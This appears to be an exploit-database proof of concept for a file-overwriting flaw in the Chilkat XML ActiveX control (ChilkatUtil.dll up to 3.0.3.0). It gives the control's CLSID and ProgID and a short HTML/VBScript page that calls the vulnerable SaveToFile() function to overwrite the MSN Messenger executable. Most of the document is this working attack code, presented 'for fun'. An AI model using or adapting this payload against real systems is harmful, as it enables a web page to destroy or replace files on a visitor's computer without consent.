Chilkat XML Active-X file overwriting vulnerability proof of concept exploit.
5e56c809714748e0fa46b889adfdd18abe037cfd0d105d4df9fd58a328fd4ba0
Chilkat XML ActiveX File overwriting vulnerability PoC(on msn.exe) for fun
Discovered by: shinnai
PoC by: e.wiZz!
In the wild...
File: ChilkatUtil.dll <= 3.0.3.0
CLSID: {5022FAE8-B780-4B78-B8DC-1AF1145A4F42}
ProgID: ChilkatUtil.CkData.1
Descr.: Chilkat CkData
Vulnerable function SaveToFile()
PoC:
<object classid='clsid:5022FAE8-B780-4B78-B8DC-1AF1145A4F42' id='target' />
<script language='vbscript'>
'Wscript.echo typename(target)
targetFile = "C:\Program Files\Chilkat Software Inc\Chilkat XML ActiveX\ChilkatUtil.dll"
prototype = "Function SaveToFile ( ByVal filename As String ) As Long"
memberName = "SaveToFile"
progid = "CHILKATUTILLib.CkData"
argCount = 1
arg1="C:\Program Files\MSN Messenger\msnmsgr.exe"
target.SaveToFile arg1
</script>